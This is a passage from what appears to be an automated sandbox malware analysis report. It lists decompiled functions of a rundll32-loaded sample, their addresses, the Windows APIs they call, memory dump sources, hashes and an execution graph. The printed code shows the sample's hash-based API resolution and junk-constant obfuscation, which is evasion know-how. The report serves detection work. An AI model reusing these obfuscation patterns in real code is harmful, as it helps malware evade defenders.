				void* _t26;
				void* _t30;
				void* _t31;
				void* _t33;
				intOrPtr _t34;

				_t31 = __edx;
				_t34 = __ecx;
				E003120B9(_t21);
				_v12 = 0x9fac18;
				_v12 = _v12 ^ 0x90454497;
				_v12 = _v12 ^ 0x90d3245f;
				_v8 = 0x647eb;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 >> 3;
				_v8 = _v8 + 0xffff0b9f;
				_v8 = _v8 ^ 0xfff54d3d;
				_t25 = E0031AA30(0x2d1, 0x9df7cc0d, __ecx, 0x5aaf08f1);
				_t26 =  *_t25(_t31, 0, _t34, 0x28, __ecx, __edx, _a4, _a8, 0, _a16, _a20, 0x28, _t30, _t33, __ecx, __ecx); // executed
				return _t26;
			}












                                                                                                                                  0x00305de9
                                                                                                                                  0x00305deb
                                                                                                                                  0x00305dfa
                                                                                                                                  0x00305dff
                                                                                                                                  0x00305e09
                                                                                                                                  0x00305e15
                                                                                                                                  0x00305e1c
                                                                                                                                  0x00305e23
                                                                                                                                  0x00305e27
                                                                                                                                  0x00305e2b
                                                                                                                                  0x00305e32
                                                                                                                                  0x00305e4a
                                                                                                                                  0x00305e58
                                                                                                                                  0x00305e5f

                                                                                                                                  APIs
                                                                                                                                  • SetFileInformationByHandle.KERNEL32(65528FD4,00000000,?,00000028), ref: 00305E58
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.499309188.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.499302641.0000000000300000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.499327123.0000000000323000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_300000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileHandleInformation
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3935143524-0
                                                                                                                                  • Opcode ID: 1342c75f1a0eb519f77f2bc21feb826310fd141c5a5d19468efb3ead449ac199
                                                                                                                                  • Instruction ID: eea8cb07bc99495c6e970d52cacbbdbd6f34a9ea244f74bf77ff21df8cecbc74
                                                                                                                                  • Opcode Fuzzy Hash: 1342c75f1a0eb519f77f2bc21feb826310fd141c5a5d19468efb3ead449ac199
                                                                                                                                  • Instruction Fuzzy Hash: EE01BC76941208BBDB24DE90CC0AEEEBF74EF55314F108088F50466250D3B05B509BA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00301E22 Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 280 301e22-301ea6 call 3120b9 call 31aa30 RtlAllocateHeap
                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                  			E00301E22(long __ecx, void* __edx, long _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t27;
				void* _t34;
				signed int _t36;
				long _t42;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t42 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E003120B9(_t27);
				_v12 = 0x309d17;
				_v12 = _v12 | 0x1b560655;
				_v12 = _v12 ^ 0x1b78328a;
				_v8 = 0xa187d;
				_v8 = _v8 + 0xa972;
				_t36 = 0x67;
				_v8 = _v8 / _t36;
				_v8 = _v8 << 7;
				_v8 = _v8 ^ 0x000b519a;
				E0031AA30(0x1c2, 0x9df7cc0d, _t36, 0x8eab3015);
				_t34 = RtlAllocateHeap(_a8, _t42, _a4); // executed
				return _t34;
			}









                                                                                                                                  0x00301e25
                                                                                                                                  0x00301e26
                                                                                                                                  0x00301e28
                                                                                                                                  0x00301e2b
                                                                                                                                  0x00301e2d
                                                                                                                                  0x00301e30
                                                                                                                                  0x00301e33
                                                                                                                                  0x00301e37
                                                                                                                                  0x00301e38
                                                                                                                                  0x00301e3d
                                                                                                                                  0x00301e47
                                                                                                                                  0x00301e50
                                                                                                                                  0x00301e57
                                                                                                                                  0x00301e5e
                                                                                                                                  0x00301e6a
                                                                                                                                  0x00301e72
                                                                                                                                  0x00301e7a
                                                                                                                                  0x00301e7e
                                                                                                                                  0x00301e91
                                                                                                                                  0x00301ea0
                                                                                                                                  0x00301ea6

                                                                                                                                  APIs
                                                                                                                                  • RtlAllocateHeap.NTDLL(AF136809,000C892D,1B78328A,?,?,?,003080DB,?,00000000,AF136809), ref: 00301EA0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.499309188.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.499302641.0000000000300000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.499327123.0000000000323000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_300000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                  • Opcode ID: 17d2fe5eb58d72b3578096db544abd1a3df4a71cc1238501c62d01f2d4a045a2
                                                                                                                                  • Instruction ID: 4d10af35013a1c98ba89798ec36b9fc0d14af4677841a3e5583659925332367d
                                                                                                                                  • Opcode Fuzzy Hash: 17d2fe5eb58d72b3578096db544abd1a3df4a71cc1238501c62d01f2d4a045a2
                                                                                                                                  • Instruction Fuzzy Hash: 69014876901108FBEB05DFD4DC0A8DE7BB5EF49354F208089F9085A211D7B29F60AB91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 003146BB Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 285 3146bb-31473b call 3120b9 call 31aa30 SHGetFolderPathW
                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                  			E003146BB(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t21;
				intOrPtr* _t25;
				void* _t26;

				E003120B9(_t21);
				_v20 = 0x3f5bb0;
				_v16 = 0;
				_v12 = 0x996874;
				_v12 = _v12 << 0xf;
				_v12 = _v12 ^ 0xb43bad9d;
				_v8 = 0xebf0af;
				_v8 = _v8 ^ 0x3b7dcb24;
				_v8 = _v8 ^ 0x3b96d1fd;
				_t25 = E0031AA30(0x220, 0xdf0d4f1a, __ecx, 0x54d725f);
				_t26 =  *_t25(0, _a24, 0, 0, _a4, __ecx, __edx, _a4, 0, 0, 0, _a20, _a24, _a28); // executed
				return _t26;
			}










                                                                                                                                  0x003146d5
                                                                                                                                  0x003146da
                                                                                                                                  0x003146e4
                                                                                                                                  0x003146ec
                                                                                                                                  0x003146f3
                                                                                                                                  0x003146f7
                                                                                                                                  0x003146fe
                                                                                                                                  0x00314705
                                                                                                                                  0x0031470c
                                                                                                                                  0x00314724
                                                                                                                                  0x00314735
                                                                                                                                  0x0031473b

                                                                                                                                  APIs
                                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,B43BAD9D), ref: 00314735
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.499309188.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.499302641.0000000000300000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.499327123.0000000000323000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_300000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FolderPath
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1514166925-0
                                                                                                                                  • Opcode ID: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                                  • Instruction ID: 191bbc8e77642811be7eda9267c769e688676eb37a0f15484cafca7cbfb60fe1
                                                                                                                                  • Opcode Fuzzy Hash: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                                  • Instruction Fuzzy Hash: 4D01EC75802218BBCF15AFD5DC498DFBFB8EF49394F108145F91866211D2758A60DBD1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 003093ED Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 73%
                                                                                                                                  			E003093ED() {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _t24;

				_v28 = 0xda6c64;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = 0x88a564;
				_v12 = _v12 | 0x9bf5ed5c;
				_v12 = _v12 ^ 0x9bf17c37;
				_v8 = 0xd9241f;
				_v8 = _v8 * 0x5c;
				_v8 = _v8 + 0xccdd;
				_v8 = _v8 + 0x903;
				_v8 = _v8 ^ 0x4e0c4bb2;
				E0031AA30(0x1d2, 0x9df7cc0d, _t24, 0x98a8878d);
				ExitProcess(0);
			}








                                                                                                                                  0x003093f3
                                                                                                                                  0x00309405
                                                                                                                                  0x00309411
                                                                                                                                  0x00309412
                                                                                                                                  0x00309413
                                                                                                                                  0x0030941a
                                                                                                                                  0x00309421
                                                                                                                                  0x00309428
                                                                                                                                  0x00309433
                                                                                                                                  0x00309436
                                                                                                                                  0x0030943d
                                                                                                                                  0x00309444
                                                                                                                                  0x00309451
                                                                                                                                  0x0030945b

                                                                                                                                  APIs
                                                                                                                                  • ExitProcess.KERNEL32(00000000), ref: 0030945B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.499309188.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.499302641.0000000000300000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.499327123.0000000000323000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_300000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExitProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                  • Opcode ID: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                                  • Instruction ID: b3746c020b2faffe43c82afac23164d170eeb67aaa1f4460cc3db4304ce424f0
                                                                                                                                  • Opcode Fuzzy Hash: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                                  • Instruction Fuzzy Hash: D2F03C71901308FBEB04DBE8DA4699DFBB4EB50314F2081A9DA04B7261E7705F459A91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00318F9E Relevance: 1.5, APIs: 1, Instructions: 31serviceCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 55%
                                                                                                                                  			E00318F9E(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				unsigned int _v8;
				unsigned int _v12;
				void* _t19;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E003120B9(_t19);
				_v12 = 0xd87912;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0006adfb;
				_v8 = 0xf5ad8e;
				_v8 = _v8 + 0xc481;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x00032ff7;
				E0031AA30(0x26e, 0x20a9b263, __ecx, 0x37d4b579);
				_t24 = CloseServiceHandle(_a12); // executed
				return _t24;
			}







                                                                                                                                  0x00318fa1
                                                                                                                                  0x00318fa2
                                                                                                                                  0x00318fa3
                                                                                                                                  0x00318fa6
                                                                                                                                  0x00318fa9
                                                                                                                                  0x00318fad
                                                                                                                                  0x00318fae
                                                                                                                                  0x00318fb3
                                                                                                                                  0x00318fbd
                                                                                                                                  0x00318fc6
                                                                                                                                  0x00318fcd
                                                                                                                                  0x00318fd4
                                                                                                                                  0x00318fdb
                                                                                                                                  0x00318fdf
                                                                                                                                  0x00318ff7
                                                                                                                                  0x00319002
                                                                                                                                  0x00319007

                                                                                                                                  APIs
                                                                                                                                  • CloseServiceHandle.ADVAPI32(33E0711C), ref: 00319002
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.499309188.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.499302641.0000000000300000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.499327123.0000000000323000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_300000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandleService
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1725840886-0
                                                                                                                                  • Opcode ID: 7721f494cb045c1adf2975ecc10c8ea825fd6ee4babf1da4d00f55aede024231
                                                                                                                                  • Instruction ID: 01ef5c5d7867656e1d66647c8bc4b6e90a105d073253b10d34fe555f5ba588de
                                                                                                                                  • Opcode Fuzzy Hash: 7721f494cb045c1adf2975ecc10c8ea825fd6ee4babf1da4d00f55aede024231
                                                                                                                                  • Instruction Fuzzy Hash: 19F0F9B591120CFFDF06AFD4C94A89EBBB4EB14308F208198F80566611D6769B64EF51
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00311F8A Relevance: 1.5, APIs: 1, Instructions: 31fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                  			E00311F8A(intOrPtr __ecx, void* __edx, WCHAR* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t19;
				int _t25;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E003120B9(_t19);
				_v12 = 0x96b134;
				_v12 = _v12 + 0xdeb4;
				_v12 = _v12 | 0x0c5d8169;
				_v12 = _v12 ^ 0x0cdc4dba;
				_v8 = 0xf8ae2a;
				_v8 = _v8 + 0xcab3;
				_v8 = _v8 * 0x2b;
				_v8 = _v8 ^ 0x29e0cf29;
				E0031AA30(0x112, 0x9df7cc0d, __ecx, 0x6fe24f6c);
				_t25 = DeleteFileW(_a4); // executed
				return _t25;
			}







                                                                                                                                  0x00311f8d
                                                                                                                                  0x00311f8e
                                                                                                                                  0x00311f8f
                                                                                                                                  0x00311f93
                                                                                                                                  0x00311f94
                                                                                                                                  0x00311f99
                                                                                                                                  0x00311fa3
                                                                                                                                  0x00311faf
                                                                                                                                  0x00311fb6
                                                                                                                                  0x00311fbd
                                                                                                                                  0x00311fc4
                                                                                                                                  0x00311fda
                                                                                                                                  0x00311fdd
                                                                                                                                  0x00311fea
                                                                                                                                  0x00311ff5
                                                                                                                                  0x00311ffa

                                                                                                                                  APIs
                                                                                                                                  • DeleteFileW.KERNEL32(0CDC4DBA,?,?,?,?), ref: 00311FF5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.499309188.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.499302641.0000000000300000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.499327123.0000000000323000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_300000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DeleteFile
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4033686569-0
                                                                                                                                  • Opcode ID: d9141e2dac26f15b35629e5f1bbea3b611062587ec9c1243f53570606ca8c40c
                                                                                                                                  • Instruction ID: d9bdd3f7ec9845b8c1938d8911ea73938f6db1eb20df988d99dbe5f790a5c4e1
                                                                                                                                  • Opcode Fuzzy Hash: d9141e2dac26f15b35629e5f1bbea3b611062587ec9c1243f53570606ca8c40c
                                                                                                                                  • Instruction Fuzzy Hash: 4FF0E7B1901208FBDB18EF94D9468EEBFB5EB54314F208299E40466222E7715F949B91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00315BFD Relevance: 1.5, APIs: 1, Instructions: 31libraryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                  			E00315BFD(intOrPtr __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t20;
				struct HINSTANCE__* _t25;

				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E003120B9(_t20);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x5faaf9;
				_v20 = 0xab22cd;
				_v12 = 0x8e3542;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x00089943;
				_v8 = 0x9b967a;
				_v8 = _v8 ^ 0x4689732a;
				_v8 = _v8 ^ 0x4619bdd7;
				E0031AA30(0x12d, 0x9df7cc0d, __ecx, 0xf5e9dd1e);
				_t25 = LoadLibraryW(_a8); // executed
				return _t25;
			}










                                                                                                                                  0x00315c03
                                                                                                                                  0x00315c06
                                                                                                                                  0x00315c0a
                                                                                                                                  0x00315c0b
                                                                                                                                  0x00315c10
                                                                                                                                  0x00315c17
                                                                                                                                  0x00315c23
                                                                                                                                  0x00315c2a
                                                                                                                                  0x00315c31
                                                                                                                                  0x00315c35
                                                                                                                                  0x00315c3c
                                                                                                                                  0x00315c43
                                                                                                                                  0x00315c4a
                                                                                                                                  0x00315c62
                                                                                                                                  0x00315c6d
                                                                                                                                  0x00315c72

                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryW.KERNEL32(00000000), ref: 00315C6D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.499309188.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.499302641.0000000000300000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.499327123.0000000000323000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_300000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                  • Opcode ID: e382c7baeaf3a69a46a4a7878245b3f76dac83df27b8d9f7b041c7ed08bbac4f
                                                                                                                                  • Instruction ID: aa231f2a9657167dbcbd9a5379fccf12a8144ded94f6ba0ec1a36c047b255708
                                                                                                                                  • Opcode Fuzzy Hash: e382c7baeaf3a69a46a4a7878245b3f76dac83df27b8d9f7b041c7ed08bbac4f
                                                                                                                                  • Instruction Fuzzy Hash: 64F0FFB5C0020CFBCF09EFE4DA06AEEBBB4FB44318F108188E91566212D3B54B58DB91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0030B23C Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                  			E0030B23C(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
				signed int _v8;
				signed int _v12;
				void* _t27;
				int _t32;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E003120B9(_t27);
				_v12 = 0x6268;
				_v12 = _v12 ^ 0x57e834c3;
				_v12 = _v12 + 0xffff2919;
				_v12 = _v12 + 0xffff3e3d;
				_v12 = _v12 ^ 0x57e9dc2b;
				_v8 = 0xa46433;
				_v8 = _v8 + 0x98ba;
				_v8 = _v8 | 0xc390ebe9;
				_v8 = _v8 + 0xd5b0;
				_v8 = _v8 ^ 0xc3bab866;
				E0031AA30(0xb5, 0x9df7cc0d, __ecx, 0xaca78213);
				_t32 = lstrcmpiW(_a16, _a4); // executed
				return _t32;
			}







                                                                                                                                  0x0030b23f
                                                                                                                                  0x0030b240
                                                                                                                                  0x0030b241
                                                                                                                                  0x0030b244
                                                                                                                                  0x0030b247
                                                                                                                                  0x0030b24a
                                                                                                                                  0x0030b24e
                                                                                                                                  0x0030b24f
                                                                                                                                  0x0030b254
                                                                                                                                  0x0030b25e
                                                                                                                                  0x0030b26a
                                                                                                                                  0x0030b271
                                                                                                                                  0x0030b278
                                                                                                                                  0x0030b27f
                                                                                                                                  0x0030b286
                                                                                                                                  0x0030b28d
                                                                                                                                  0x0030b294
                                                                                                                                  0x0030b29b
                                                                                                                                  0x0030b2b3
                                                                                                                                  0x0030b2c1
                                                                                                                                  0x0030b2c6

                                                                                                                                  APIs
                                                                                                                                  • lstrcmpiW.KERNEL32(EE1E6DE5,57E9DC2B), ref: 0030B2C1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.499309188.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.499302641.0000000000300000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.499327123.0000000000323000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_300000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcmpi
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1586166983-0
                                                                                                                                  • Opcode ID: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                                  • Instruction ID: f421c825b97370d69a8725f27f88511a9b6b870dc38891dfc6f6884a7d3686bc
                                                                                                                                  • Opcode Fuzzy Hash: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                                  • Instruction Fuzzy Hash: 170116B2C04608FFDF45DFD4DD468EEBBB5EB44314F208188B90566262E3728B60AB61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00311E67 Relevance: 1.3, APIs: 1, Instructions: 34COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                  			E00311E67(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t23;
				int _t29;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E003120B9(_t23);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x62b4e9;
				_v20 = 0xc383c4;
				_v12 = 0x238243;
				_v12 = _v12 * 0x67;
				_v12 = _v12 ^ 0x0e4d658b;
				_v8 = 0x6564d0;
				_v8 = _v8 ^ 0x2b193590;
				_v8 = _v8 << 0xd;
				_v8 = _v8 ^ 0x8a2acb03;
				E0031AA30(0x23f, 0x9df7cc0d, __ecx, 0x3185251c);
				_t29 = CloseHandle(_a12); // executed
				return _t29;
			}










                                                                                                                                  0x00311e6d
                                                                                                                                  0x00311e70
                                                                                                                                  0x00311e73
                                                                                                                                  0x00311e77
                                                                                                                                  0x00311e78
                                                                                                                                  0x00311e7d
                                                                                                                                  0x00311e84
                                                                                                                                  0x00311e90
                                                                                                                                  0x00311e97
                                                                                                                                  0x00311ead
                                                                                                                                  0x00311eb0
                                                                                                                                  0x00311eb7
                                                                                                                                  0x00311ebe
                                                                                                                                  0x00311ec5
                                                                                                                                  0x00311ec9
                                                                                                                                  0x00311ed6
                                                                                                                                  0x00311ee1
                                                                                                                                  0x00311ee6

                                                                                                                                  APIs
                                                                                                                                  • CloseHandle.KERNEL32(00C383C4), ref: 00311EE1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.499309188.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.499302641.0000000000300000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.499327123.0000000000323000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_300000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                  • Opcode ID: c4708a402737a47667ccad7e6bda5106f8ba5e7004358f80371dbad68f71623e
                                                                                                                                  • Instruction ID: 4c075abf0e7bd5efd74d9c5959b61f23eee41f6b1145f2cb1f6e43c1db91dbb5
                                                                                                                                  • Opcode Fuzzy Hash: c4708a402737a47667ccad7e6bda5106f8ba5e7004358f80371dbad68f71623e
                                                                                                                                  • Instruction Fuzzy Hash: 050124B5C00208FBCF44EFA4E94A9AEBFB5EB04308F108498E8156B212D7718B64DF91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:16.1%
                                                                                                                                  Dynamic/Decrypted Code Coverage:16.2%
                                                                                                                                  Signature Coverage:0%
                                                                                                                                  Total number of Nodes:297
                                                                                                                                  Total number of Limit Nodes:23
                                                                                                                                  execution_graph 31846 10035042 TlsGetValue 31847 10035076 GetModuleHandleA 31846->31847 31848 10035055 31846->31848 31849 10035085 GetProcAddress 31847->31849 31850 1003509f 31847->31850 31848->31847 31851 1003505f TlsGetValue 31848->31851 31852 1003506e 31849->31852 31854 1003506a 31851->31854 31852->31850 31853 10035095 RtlEncodePointer 31852->31853 31853->31850 31854->31847 31854->31852 31855 10020c26 31856 10020c32 __EH_prolog3 31855->31856 31858 10020c80 31856->31858 31866 1002083b EnterCriticalSection 31856->31866 31880 100201f1 RaiseException __CxxThrowException@8 31856->31880 31881 1002094b TlsAlloc InitializeCriticalSection 31856->31881 31882 100206c8 EnterCriticalSection TlsGetValue LeaveCriticalSection LeaveCriticalSection 31858->31882 31861 10020c8d 31863 10020c93 31861->31863 31864 10020ca6 ~_Task_impl 31861->31864 31883 100209ed 88 API calls 5 library calls 31863->31883 31871 1002085a 31866->31871 31867 10020916 _memset 31868 1002092a LeaveCriticalSection 31867->31868 31868->31856 31869 10020893 31884 10014460 31869->31884 31870 100208a8 GlobalHandle GlobalUnlock 31873 10014460 ctype 80 API calls 31870->31873 31871->31867 31871->31869 31871->31870 31875 100208c5 GlobalReAlloc 31873->31875 31876 100208cf 31875->31876 31877 100208f7 GlobalLock 31876->31877 31878 100208da GlobalHandle GlobalLock 31876->31878 31879 100208e8 LeaveCriticalSection 31876->31879 31877->31867 31878->31879 31879->31877 31881->31856 31882->31861 31883->31864 31885 10014477 ctype 31884->31885 31886 1001448c GlobalAlloc 31885->31886 31888 10013ba0 80 API calls _DebugHeapAllocator 31885->31888 31886->31876 31888->31886 31889 10030d06 31890 10030d12 31889->31890 31891 10030d0d 31889->31891 31895 10030c10 31890->31895 31907 1003906d GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 31891->31907 31894 10030d23 31897 10030c1c __msize 31895->31897 31896 10030c69 31904 10030cb9 __msize 31896->31904 31962 100125c0 31896->31962 31897->31896 31897->31904 31908 10030a37 31897->31908 31901 10030c99 31902 10030a37 __CRT_INIT@12 165 API calls 31901->31902 31901->31904 31902->31904 31903 100125c0 ___DllMainCRTStartup 146 API calls 31905 10030c90 31903->31905 31904->31894 31906 10030a37 __CRT_INIT@12 165 API calls 31905->31906 31906->31901 31907->31890 31909 10030b61 31908->31909 31910 10030a4a GetProcessHeap HeapAlloc 31908->31910 31911 10030b67 31909->31911 31912 10030b9c 31909->31912 31913 10030a67 31910->31913 31914 10030a6e GetVersionExA 31910->31914 31911->31913 31921 10030b86 31911->31921 32010 100310be 67 API calls _doexit 31911->32010 31915 10030ba1 31912->31915 31916 10030bfa 31912->31916 31913->31896 31917 10030a89 GetProcessHeap HeapFree 